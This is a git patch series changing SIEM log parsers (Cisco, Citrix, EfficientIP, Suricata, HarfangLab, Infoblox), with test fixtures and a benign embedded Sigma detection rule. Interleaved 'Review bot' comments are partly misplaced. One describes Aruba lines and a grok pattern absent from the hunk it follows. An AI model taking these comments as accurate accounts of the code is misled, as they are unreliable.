set_ecs_fields diff --git a/Cisco/cisco-ise/ingest/parser.yml b/Cisco/cisco-ise/ingest/parser.yml index 218053f07..015a469be 100644 --- a/Cisco/cisco-ise/ingest/parser.yml +++ b/Cisco/cisco-ise/ingest/parser.yml @@ -4,7 +4,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: original.message output_field: pre_message pattern: "%{DATA:status}:%{GREEDYDATA:reason_with_kv}" 
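Review bot: Dropping `raise_errors: false` from `parse_message` restores the grok default for lines that do not match `%{DATA:prefix}\:\s*%{USERNAME:obs}\s*\:\s*%{GREEDYDATA:payload}\s*`, and unlike the sub-parsers below this step has no `filter:` guarding it, so every Aruba line now goes through it; the patch message ("Fix comments") does not say whether such lines are expected to be rejected or to pass through with an empty `prefix`. Since the override was added in patch 001 specifically for "formats that have different input", please either keep a fixture for such a line under `tests/` or add a one-line comment above the step, e.g. `# no raise_errors override: lines that do not match this layout are reported as parse errors by design`, so the next reader knows the revert is intentional. The default value of `raise_errors` is not visible in this patch, so the exact failure mode should be confirmed against the grok action before merging.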
@@ -14,7 +13,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{pre_parsed_event.pre_message.reason_with_kv}}" output_field: time_message pattern: "%{DATA:start_of_msg}: %{DATA:reason},%{GREEDYDATA:end_of_msg}" @@ -24,7 +22,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{grok_timestamp_in_status.time_message.end_of_msg}}" output_field: event_outcome pattern: " MESSAGE=%{DATA:outcome_msg}," @@ -34,7 +31,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{grok_timestamp_in_status.time_message.end_of_msg}}" output_field: event_outcomes pattern: " MESSAGE=%{DATA:outcome_msg} threshold_space = %{DATA:threshold_space}, used_space = %{DATA:used_space}," @@ -44,7 +40,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{pre_parsed_event.pre_message.reason_with_kv}}" output_field: message pattern: "%{DATA:reason}:%{GREEDYDATA:kv}" @@ -54,7 +49,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{parsed_event.message.reason.strip()}}" output_field: conf_result pattern: "Configuration %{WORD:change}" @@ -64,7 +58,6 @@ pipeline: external: name: kv.parse-kv properties: - raise_errors: false input_field: "{{parsed_event.message.kv.strip()}}" output_field: result value_sep: "=" @@ -75,7 +68,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: '{{parsed_kv_sentence.result.get("NAS Identifier")}}' output_field: adress_mac pattern: "%{MAC:adress}:%{GREEDYDATA:word}" diff --git a/Cisco/cisco-meraki/ingest/parser.yml b/Cisco/cisco-meraki/ingest/parser.yml index 8b06aa6bc..7f3baaa74 100644 --- a/Cisco/cisco-meraki/ingest/parser.yml +++ b/Cisco/cisco-meraki/ingest/parser.yml @@ -4,7 +4,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{original.message}}" output_field: message pattern: >- 
@@ -21,7 +20,6 @@ pipeline: external: name: kv.parse-kv properties: - raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message value_sep: "=" @@ -31,7 +29,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{kv_part_message.message.src}}" output_field: message pattern: "^%{IP:src_ip}:%{NUMBER:src_port}$" @@ -40,7 +37,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{kv_part_message.message.dst}}" output_field: message pattern: "^%{IP:dst_ip}:%{NUMBER:dst_port}$" @@ -56,7 +52,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message pattern: ^%{WORD:action}\s%{GREEDYDATA}$ @@ -67,7 +62,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message pattern: ^(%{WORD:log_subtype}|type=%{WORD:log_subtype})\s%{GREEDYDATA}$ @@ -78,7 +72,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message pattern: >- @@ -93,7 +86,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message pattern: >- @@ -107,7 +99,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message pattern: >- @@ -121,7 +112,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message pattern: >- @@ -134,7 +124,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message pattern: >- 
@@ -150,7 +139,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message pattern: >- diff --git a/Cisco/cisco-secure-firewall/ingest/parser.yml b/Cisco/cisco-secure-firewall/ingest/parser.yml index 00b0ffdce..04ce99510 100644 --- a/Cisco/cisco-secure-firewall/ingest/parser.yml +++ b/Cisco/cisco-secure-firewall/ingest/parser.yml @@ -4,7 +4,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "original.message" output_field: pre_message pattern: '((<[0-9]+>)?(%{SYSLOGTIMESTAMP:timestamp}|%{TIMESTAMP_ISO8601:timestamp})?(%{IP:log_ip})?(%{SPACE}%{DATA:log_hostname}%{SPACE})?(\:)?\%%{PRODUCT_NAME:product}\-[0-9]{1}\-%{MESSAGE_NUMBER:message_number_grok}\: %{GREEDYDATA:raw_message})|\s?%{GREEDYDATA:raw_message}' @@ -17,7 +16,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{pre_parsing.pre_message.raw_message}}" output_field: message pattern: "%{Group_1}|%{Group_2}|%{Group_3}|%{Group_4}|%{Group_5}|%{Group_6}|%{Group_7}|%{Group_8}|%{Group_9}|%{Group_10}" @@ -171,7 +169,6 @@ pipeline: external: name: kv.parse-kv properties: - raise_errors: false input_field: "{{pre_parsing.pre_message.raw_message}}" output_field: parse_kv2_field value_sep: ':\s' diff --git a/Cisco/cisco-secure-web-appliance/ingest/parser.yml b/Cisco/cisco-secure-web-appliance/ingest/parser.yml index 6f782efa3..18e6dd0c1 100644 --- a/Cisco/cisco-secure-web-appliance/ingest/parser.yml +++ b/Cisco/cisco-secure-web-appliance/ingest/parser.yml 
@@ -4,7 +4,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: original.message output_field: message pattern: '%{PREFIX}%{NUMBER:timestamp}\s+%{NUMBER:elapsed}\s+%{IP:source_ip}\s+%{WORD:code}/%{NUMBER:status}\s+%{NUMBER:http_response_bytes}\s+%{WORD:method}\s+%{NOTSPACE:url}\s+%{NOTSPACE:username}\s+%{NOTSPACE:hierarchy_code}/(%{IP:peerhostip}|%{NOTSPACE:peerhost})\s+%{NOTSPACE:mime_type}\s+%{NOTSPACE:acl_decision}\s+<%{VERDICT:scanning_verdict_information}>\s+%{DATA:user_agent}.*' @@ -23,7 +22,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: parsed_event.message.acl_decision output_field: result pattern: "%{WORD:decision_tag}-%{WORD:policy_group_name}-%{WORD:policy_identity}-%{WORD:outbound_malware_scanning_policy}-%{WORD:data_security_policy}-%{WORD:external_dlp_policy}-%{WORD:routing_policy}" @@ -32,7 +30,6 @@ pipeline: external: name: dsv.parse-dsv properties: - raise_errors: false input_field: "{{parsed_event.message.scanning_verdict_information}}" output_field: results columnnames: diff --git a/Citrix/citrix-adc/ingest/parser.yml b/Citrix/citrix-adc/ingest/parser.yml index 712394227..9c6c377a7 100644 --- a/Citrix/citrix-adc/ingest/parser.yml +++ b/Citrix/citrix-adc/ingest/parser.yml @@ -12,7 +12,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false output_field: message pattern: '\"?\s*%{HEADER:header}\s+:\s+%{WORD:mode}\s+%{WORD:type} %{WORD:message_type} %{NUMBER:n1} %{NUMBER:n2} :\s+%{GREEDYDATA:payload}\"?' custom_patterns: @@ -45,7 +44,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{parse_audit_header.message.payload}}" output_field: message pattern: "%{SOURCE}%{SEP}(%{VSERVER}%{SEP})?(%{NAT}%{SEP})?%{DEST}.*%{BYTES_SEND}.*%{BYTES_RECV}.*" 
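Review bot: Unlike the Secure Firewall parser in this same patch, whose pre-parsing pattern ends in a `|\s?%{GREEDYDATA:raw_message}` fallback, the access-log pattern here is strict (`%{PREFIX}%{NUMBER:timestamp}\s+%{NUMBER:elapsed}\s+%{IP:source_ip}…`), so removing `raise_errors: false` means any line with a different column layout (a customised access-log format, or a `-` where `%{NUMBER}` is expected) now takes the grok default path instead of being skipped. That may be the desired outcome, but it is a visibility change for a web-proxy feed and deserves a comment on the step, e.g. `# strict access-log layout: non-matching lines are not silently dropped (default raise_errors)`, plus a fixture with a non-conforming line so the behaviour is pinned. The two follow-on steps (`acl_decision`, `scanning_verdict_information`) only run on fields this grok extracted, so they are unaffected.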
@@ -62,7 +60,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{parse_audit_header.message.payload}}" output_field: message pattern: "%{OPTION_1}|%{OPTION_2}|%{OPTION_3}" @@ -76,7 +73,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{parse_audit_header.message.payload}}" output_field: message pattern: ".*" @@ -87,7 +83,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{parse_audit_header.message.payload}}" output_field: message pattern: ".*ClientIP %{IP:src_ip}.*ClientPort %{POSINT:src_port}.*VserverServiceIP %{IP:vserver_ip}.*VserverServicePort %{POSINT:vserver_port}.*ClientVersion %{WORD:tls_version}.*CipherSuite %{CIPHER_SUITE:tls_suite}.*" diff --git a/EfficientIP/solidserver-ddi/ingest/parser.yml b/EfficientIP/solidserver-ddi/ingest/parser.yml index 219f81146..3c5ddd91e 100644 --- a/EfficientIP/solidserver-ddi/ingest/parser.yml +++ b/EfficientIP/solidserver-ddi/ingest/parser.yml @@ -4,7 +4,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false output_field: message pattern: "%{EFFICIENTIP_DNS_QUERY}|%{EFFICIENTIP_DNS_ANSWER_1}|%{EFFICIENTIP_DNS_ANSWER_DEFAULT}|%{EFFICIENTIP_DNS_UPDATING_ZONE}|%{EFFICIENTIP_DNS_GUARDIAN}|%{EFFICIENTIP_DNS_GUARDIAN_LISTLOG}|%{EFFICIENTIP_RPZ_TRANSFER}|%{EFFICIENTIP_RPZ_ZONE}|%{EFFICIENTIP_RPZ_QNAME}|%{EFFICIENTIP_DNS_ERROR}|%{EFFICIENTIP_DNS_FORMAT_ERROR}|%{EFFICIENTIP_DNS_RECEIVED_NOTIFY}" custom_patterns: @@ -41,7 +40,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{parse_event.message.dns_records}}" output_field: message pattern: ".*?%{DNS_RECORD_HTTPS}.*" @@ -54,7 +52,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{parse_event.message.dns_records}}" output_field: message pattern: ".*?%{DNS_RECORD_RRSIG}.*" From 81af8ce7ab0e33cdb80e2a599e2a417641a45c5d Mon Sep 17 00:00:00 2001 
From: Erwan Chevalier
Date: Fri, 29 Nov 2024 16:20:57 +0100
Subject: [PATCH 109/150] fix(suricata): missing rdp smart description
---
.../suricata/_meta/smart-descriptions.json | 16 ++++++
Suricata/suricata/tests/rdp.json | 57 +++++++++++++++++++
2 files changed, 73 insertions(+)
create mode 100644 Suricata/suricata/tests/rdp.json
diff --git a/Suricata/suricata/_meta/smart-descriptions.json b/Suricata/suricata/_meta/smart-descriptions.json
index fc89638e0..b330a23c1 100644
--- a/Suricata/suricata/_meta/smart-descriptions.json
+++ b/Suricata/suricata/_meta/smart-descriptions.json
@@ -198,6 +198,22 @@
 }
 ]
 },
+ {
+ "value": "RDP traffic from {source.ip} to {destination.ip}",
+ "conditions": [
+ {
+ "field": "action.type",
+ "value": "rdp"
+ }
+ ],
+ "relationships": [
+ {
+ "source": "source.ip",
+ "target": "destination.ip",
+ "type": "requested"
+ }
+ ]
+ },
 {
 "value": "Traffic flow from {source.ip} with {user_agent.original} to {destination.ip} with {http.request.method} request to {url.original}",
 "conditions": [
diff --git a/Suricata/suricata/tests/rdp.json b/Suricata/suricata/tests/rdp.json
new file mode 100644
index 000000000..131dd7025
--- /dev/null
+++ b/Suricata/suricata/tests/rdp.json
@@ -0,0 +1,57 @@
+{
+ "input": {
+ "message": "{\"timestamp\":\"2024-11-29T15:08:06.239558+0000\",\"flow_id\":1822723333770346,\"in_iface\":\"eth0\",\"event_type\":\"rdp\",\"src_ip\":\"14.225.46.243\",\"src_port\":58953,\"dest_ip\":\"10.0.1.4\",\"dest_port\":3389,\"proto\":\"TCP\",\"community_id\":\"1:kyALzWxuJ/ruPpAqvO4KTLSsEaQ=\",\"rdp\":{\"tx_id\":2,\"event_type\":\"tls_handshake\",\"x509_serials\":[\"773dbe1ea6dc998444b4f9da1f188ba8\"]}}",
+ "sekoiaio": {
+ "intake": {
+ "dialect": "Suricata",
+ "dialect_uuid": "331fa58d-8cf9-454a-a87f-48a3dc07d4d3"
+ }
+ }
+ },
+ "expected": {
+ "message": "{\"timestamp\":\"2024-11-29T15:08:06.239558+0000\",\"flow_id\":1822723333770346,\"in_iface\":\"eth0\",\"event_type\":\"rdp\",\"src_ip\":\"14.225.46.243\",\"src_port\":58953,\"dest_ip\":\"10.0.1.4\",\"dest_port\":3389,\"proto\":\"TCP\",\"community_id\":\"1:kyALzWxuJ/ruPpAqvO4KTLSsEaQ=\",\"rdp\":{\"tx_id\":2,\"event_type\":\"tls_handshake\",\"x509_serials\":[\"773dbe1ea6dc998444b4f9da1f188ba8\"]}}",
+ "event": {
+ "category": [
+ "network"
+ ],
+ "type": [
+ "connection"
+ ]
+ },
+ "@timestamp": "2024-11-29T15:08:06.239558Z",
+ "action": {
+ "type": "rdp"
+ },
+ "destination": {
+ "address": "10.0.1.4",
+ "ip": "10.0.1.4",
+ "port": 3389
+ },
+ "host": {
+ "ip": "14.225.46.243"
+ },
+ "network": {
+ "community_id": "1:kyALzWxuJ/ruPpAqvO4KTLSsEaQ=",
+ "protocol": "TCP",
+ "transport": "TCP"
+ },
+ "observer": {
+ "ingress": {
+ "interface": {
+ "name": "eth0"
+ }
+ }
+ },
+ "related": {
+ "ip": [
+ "10.0.1.4",
+ "14.225.46.243"
+ ]
+ },
+ "source": {
+ "address": "14.225.46.243",
+ "ip": "14.225.46.243",
+ "port": 58953
+ }
+ }
+}
\ No newline at end of file
From ce88fe4040225391a5378a96ae5662a97725203a Mon Sep 17 00:00:00 2001
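Review bot: The fixture pins that `rdp.event_type: tls_handshake` and `rdp.x509_serials: ["773dbe1ea6dc998444b4f9da1f188ba8"]` are dropped from the parsed event; the certificate serial is the one RDP-layer attribute useful for hunting (an unexpected certificate presented on 3389), and ECS has `tls.server.x509.serial_number` for it. The parser is not part of this patch, so this is a follow-up rather than a blocker, but the expectation should not lock in the omission without a note explaining that it is deliberate. Separately, `14.225.46.243` is a routable public address; test inputs should use a documentation range such as `203.0.113.0/24` (RFC 5737) so fixtures never point at a real host.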
From: Sebastien Quioc Date: Fri, 29 Nov 2024 17:16:26 +0100 Subject: [PATCH 110/150] fix(Harfanglab): add event.kind: 'alert' for harfanglab alerts --- HarfangLab/harfanglab/ingest/parser.yml | 1 + HarfangLab/harfanglab/tests/alert_5.json | 1 + 2 files changed, 2 insertions(+) diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml index 93671efde..5050c7429 100644 --- a/HarfangLab/harfanglab/ingest/parser.yml +++ b/HarfangLab/harfanglab/ingest/parser.yml @@ -229,6 +229,7 @@ stages: alert_info: actions: - set: + event.kind: "alert" harfanglab.level: "{{json_event.message.level}}" rule.description: "{{json_event.message.msg}}" rule.name: "{{json_event.message.rule_name}}" diff --git a/HarfangLab/harfanglab/tests/alert_5.json b/HarfangLab/harfanglab/tests/alert_5.json index 0f68a7c8c..19abfe567 100644 --- a/HarfangLab/harfanglab/tests/alert_5.json +++ b/HarfangLab/harfanglab/tests/alert_5.json 
@@ -12,6 +12,7 @@ "message": "{\"type\": \"rtlogs\", \"level\": \"medium\", \"maturity\": \"stable\", \"quarantine\": 4, \"rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"alert_time\": \"2024-11-12T08:39:14.017+00:00\", \"rule_name\": \"User Account Added to the Local Administrators Group\", \"tags\": [\"attack.persistence\", \"attack.privilege_escalation\", \"attack.t1078.003\", \"attack.t1098\"], \"level_int\": 30, \"eventlog\": {\"level\": \"log_always\", \"type\": \"wineventlog\", \"detection_timestamp\": \"2024/11/12 08:39:13.967\", \"event_id\": 4732, \"event_data\": {\"SubjectUserSid\": \"S-1-2-4-5-6\", \"SubjectDomainName\": \"NT_DOMAIN\", \"PrivilegeList\": \"-\", \"TargetDomainName\": \"Builtin\", \"TargetUserName\": \"Administrateurs\", \"MemberSid\": \"S-1-2-4-7-8\", \"MemberName\": \"NT_DOMAIN\\\\DOEJ\", \"SubjectUserName\": \"sw-suser\", \"TargetSid\": \"S-1-2-3-4\", \"SubjectLogonId\": \"0x1234567\"}, \"record_number\": 174136362, \"event_date\": \"2024-11-12T08:39:13.205Z\", \"sigma_rule_content\": \"title: User Account Added to the Local 
Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"source_name\": \"Microsoft-Windows-Security-Auditing\", \"dont_create_eventlog\": true, \"user\": {\"domain\": \"\", \"name\": \"\", \"type\": \"unknown\", \"identifier\": \"\"}, \"thread_id\": 1728, \"log_name\": \"Security\", \"process_id\": 1224, \"status\": 0, \"ioc_matches\": [], \"provider_guid\": \"54849625-5478-4994-a5ba-3e3b0328c30d\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"log_type\": \"eventlog\", \"computer_name\": \"PC01.domain.com\", \"user_data\": {}, \"system_event_type\": \"event_log_event\"}, \"threat_values\": [], \"destination\": \"syslog\", \"@timestamp\": \"2024-11-12T08:39:14.017Z\", \"detection_date\": \"2024-11-12T08:39:13.967+00:00\", \"@event_create_date\": \"2024-11-12T08:39:14.017Z\", \"aggregation_key\": \"8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb\", \"alert_type\": \"sigma\", \"rule_id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"ingestion_date\": \"2024-11-12T08:39:14.017+00:00\", \"tenant\": \"3b37ffc8520ef542\", \"threat_type\": \"new\", \"groups\": [{\"name\": \"Postes de travail\", \"id\": 
\"11111111-2222-3333-4444-555555555555\"}, {\"name\": \"Postes de travail : Lot 3\", \"id\": \"66666666-7777-8888-9999-000000000000\"}], \"status\": \"new\", \"execution\": 0, \"agent\": {\"agentid\": \"11111111-aaaa-2222-bbbb-333333333333\", \"domain\": null, \"osproducttype\": \"Windows 10 Enterprise\", \"ostype\": \"windows\", \"dnsdomainname\": \"domain.com\", \"distroid\": null, \"domainname\": \"NT_DOMAIN\", \"osversion\": \"10.0.19045\", \"hostname\": \"PC01\", \"version\": \"4.1.6\", \"additional_info\": {}}, \"threat_key\": \"20528\", \"mitre_cells\": [\"persistence__t1078.003\", \"persistence__t1098\", \"privilege-escalation__t1078.003\", \"privilege-escalation__t1098\"], \"alert_unique_id\": \"aaaaaaaa-1111-bbbb-2222-cccccccccccc\", \"log_type\": \"alert\", \"@version\": \"1\", \"msg\": \"Detects when a user account is added into the local Administrators group.\\n This action can be the result of a malicious activity.\", \"alert_subtype\": \"eventlog\", \"detection_origin\": \"agent\"}", "event": { "dataset": "alert", + "kind": "alert", "type": [ "info" ] From 526f76676800e8db48495abb88e3981595473e3d Mon Sep 17 00:00:00 2001 From: Antoine Ryon Date: Sat, 30 Nov 2024 09:50:19 +0100 Subject: [PATCH 111/150] DNS answers handling and additional improvements --- Infoblox/ddi/ingest/parser.yml | 44 +++++++++--- Infoblox/ddi/tests/query_log_dns_2.json | 3 + Infoblox/ddi/tests/query_log_dns_3.json | 3 + Infoblox/ddi/tests/query_log_dns_4.json | 3 + Infoblox/ddi/tests/query_log_dns_5.json | 12 ++++ Infoblox/ddi/tests/query_log_dns_6.json | 47 +++++++++++++ Infoblox/ddi/tests/query_log_dns_7.json | 3 + Infoblox/ddi/tests/query_log_dns_8.json | 12 ++++ Infoblox/ddi/tests/query_log_dns_9.json | 89 +++++++++++++++++++++++++ 9 files changed, 206 insertions(+), 10 deletions(-) diff --git a/Infoblox/ddi/ingest/parser.yml b/Infoblox/ddi/ingest/parser.yml index 2fb950af6..e54b3ef79 100644 --- a/Infoblox/ddi/ingest/parser.yml +++ b/Infoblox/ddi/ingest/parser.yml 
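Review bot: Only alert_5.json gains the new `"kind": "alert"` expectation, while the `alert_info` stage in parser.yml now sets `event.kind` for every event that reaches it, so any other alert fixture under `HarfangLab/harfanglab/tests/` (the `_5` suffix suggests several) will fail unless it is updated too or never reaches `alert_info`; please confirm the whole test set was run with this change. It would also be worth asserting on one non-alert fixture that `event.kind` stays absent, so the field is shown to be gated on the stage's filter rather than applied globally (that filter is outside this hunk).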
@@ -5,7 +5,7 @@ pipeline:
 name: grok.match
 properties:
 output_field: message
- pattern: "%{DNS_FORMERR}|%{DNS_OTHER}|%{DNS_0}|%{DNS_1}|%{DNS_2}|%{DNS_3}|%{DNS_4}|%{DNS_5}|%{DNS_6}|%{DNS_7}|%{DNS_8}|%{DNS_9}|%{DNS_10}|%{DNS_11}|%{DNS_12}|%{DNS_13}"
+ pattern: "%{DNS_FORMERR}|%{DNS_OTHER}|%{DNS_0}|%{DNS_1}|%{DNS_2}|%{DNS_3}|%{DNS_4}|%{DNS_5}|%{DNS_6}|%{DNS_7}|%{DNS_8}|%{DNS_9}|%{DNS_10}|%{DNS_11}|%{DNS_12}|%{DNS_13}|%{DNS_14}"
 custom_patterns:
 QUERY_FLAGS: "%{QUERY_FLAGS_RD:flags_rd}%{QUERY_FLAGS_EDNS:flags_edns}?%{QUERY_FLAGS_TCP:flags_tcp}?%{QUERY_FLAGS_DNSSEC:flags_dnssec}?%{QUERY_FLAGS_CD:flags_cd}?%{QUERY_FLAGS_DNS_SERVER_COOKIE}?%{QUERY_FLAGS_DNS_SERVER_COOKIE_WITHOUT_VALID_SERVER}?"
 QUERY_FLAGS_RD: '[\+\-]'
@@ -28,12 +28,13 @@ pipeline:
 DNS_5: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} \\(%{DATA}\\): %{VIEW}?query failed %{GREEDYDATA:infoblox_nios_log_dns_message}"
 DNS_6: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} \\(%{DATA:infoblox_nios_log_dns_before_query}\\): rewriting query name %{DATA} to '%{DATA:infoblox_nios_log_dns_after_query}', type %{DATA:dns_question_type}"
 DNS_7: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} \\(%{DATA}\\): %{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} %{WORD:dns_question_type} %{DATA:infoblox_nios_log_dns_header_flags} \\(%{IP:server_ip}\\)"
- DNS_8: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} %{DATA:network_transport}: %{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} %{WORD:dns_question_type} response: %{DATA:dns_response_code} %{DATA:infoblox_nios_log_dns_header_flags}"
- DNS_9: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} \\(%{DATA}\\): transfer of '%{DATA:dns_question_name}/%{DATA:dns_question_class}': %{GREEDYDATA:infoblox_nios_log_dns_message}"
- DNS_10: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*CEF:0\\|Infoblox\\|NIOS\\|%{GREEDYDATA:infoblox_nios_log_dns_version}\\|RPZ-%{DATA:dns_answers_type}\\|%{DATA:infoblox_nios_log_dns_answers_policy}\\|\\d+\\|app=DNS dst=%{IP:server_ip} src=%{IP:client_ip} spt=%{NUMBER:client_port} view=%{DATA:infoblox_nios_log_dns_view_name} qtype=%{WORD:dns_question_type} msg=%{GREEDYDATA:infoblox_nios_log_dns_message}"
- DNS_11: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{GREEDYDATA:_tmp_timestamp} %{CLIENT} %{DATA:network_transport}: %{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} %{WORD:dns_question_type} response: %{DATA:dns_response_code} %{DATA:infoblox_nios_log_dns_header_flags} %{GREEDYDATA:repeat_message}"
- DNS_12: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{GREEDYDATA:_tmp_timestamp} %{CLIENT} %{DATA:network_transport}: 
%{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} %{WORD:dns_question_type} response: %{DATA:dns_response_code} %{DATA:infoblox_nios_log_dns_header_flags}"
- DNS_13: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} %{GREEDYDATA:infoblox_nios_log_dns_message}"
+ DNS_8: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} %{DATA:network_transport}: %{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} %{WORD:dns_question_type} response: %{DATA:dns_response_code} %{DATA:infoblox_nios_log_dns_header_flags} %{GREEDYDATA:dns_records}"
+ DNS_9: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} %{DATA:network_transport}: %{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} %{WORD:dns_question_type} response: %{DATA:dns_response_code} %{DATA:infoblox_nios_log_dns_header_flags}"
+ DNS_10: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} \\(%{DATA}\\): transfer of '%{DATA:dns_question_name}/%{DATA:dns_question_class}': %{GREEDYDATA:infoblox_nios_log_dns_message}"
+ DNS_11: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*CEF:0\\|Infoblox\\|NIOS\\|%{GREEDYDATA:infoblox_nios_log_dns_version}\\|RPZ-%{DATA:dns_answers_type}\\|%{DATA:infoblox_nios_log_dns_answers_policy}\\|\\d+\\|app=DNS dst=%{IP:server_ip} src=%{IP:client_ip} spt=%{NUMBER:client_port} view=%{DATA:infoblox_nios_log_dns_view_name} qtype=%{WORD:dns_question_type} msg=%{GREEDYDATA:infoblox_nios_log_dns_message}"
+ DNS_12: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{GREEDYDATA:_tmp_timestamp} %{CLIENT} %{DATA:network_transport}: %{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} %{WORD:dns_question_type} response: %{DATA:dns_response_code} %{DATA:infoblox_nios_log_dns_header_flags} %{GREEDYDATA:dns_records}"
+ DNS_13: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{GREEDYDATA:_tmp_timestamp} %{CLIENT} %{DATA:network_transport}: %{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} 
%{WORD:dns_question_type} response: %{DATA:dns_response_code} %{DATA:infoblox_nios_log_dns_header_flags}"
+ DNS_14: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} %{GREEDYDATA:infoblox_nios_log_dns_message}"
 # Original pattern
 DNS_0: '(%{WORD:infoblox_nios_log_dns_category}: )?client ?(%{DATA}) %{IP:client_ip}#%{INT:client_port} (%{DATA}): query: %{DATA:dns_question_name} %{WORD:dns_question_class} %{WORD:dns_question_type} %{QUERY_FLAGS} \(%{IP}\)'
@@ -132,7 +133,6 @@ stages:
 infoblox.dhcp.lease_time: "{{parse_event.message.infoblox_nios_log_dhcp_lease_time}}"
 infoblox.dhcp.circuit_id: "{{parse_event.message.infoblox_nios_log_dhcp_circuit_id}}"
- dns.type: "query"
 dns.question.class: "{{parse_event.message.dns_question_class}}"
 dns.question.type: "{{parse_event.message.dns_question_type}}"
 dns.question.name: "{{parse_event.message.dns_question_name}}"
